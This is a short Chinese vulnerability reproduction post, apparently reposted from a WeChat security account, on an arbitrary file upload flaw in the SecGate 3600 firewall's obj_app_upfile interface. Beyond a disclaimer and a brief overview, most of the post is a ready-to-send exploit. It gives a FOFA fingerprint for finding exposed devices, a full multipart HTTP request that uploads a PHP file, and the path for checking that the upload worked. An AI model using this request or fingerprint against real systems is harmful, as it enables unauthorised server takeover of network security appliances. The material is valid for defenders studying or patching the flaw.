“ 人性的背后是白云苍狗,愿你我都是生活的高手。”
声明:文章中涉及的所有内容,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
0x01.漏洞概述
网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
0x02.影响范围
网神 SecGate 3600 防火墙
0x03.漏洞复现
FOFA指纹:fid="1Lh1LHi6yfkhiO83I59AYg=="
POC如下
POST /?g=obj_app_upfile HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Content-Length: 553
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
构造数据包,发送
访问上传的文件,如返回404则证明漏洞不存在
https://your-ip/attachements/test.php
遵守网络安全法,请勿用于非法入侵,仅供学习
原文始发于微信公众号(深白网安):网神 SecGate 3600 防火墙任意文件上传漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论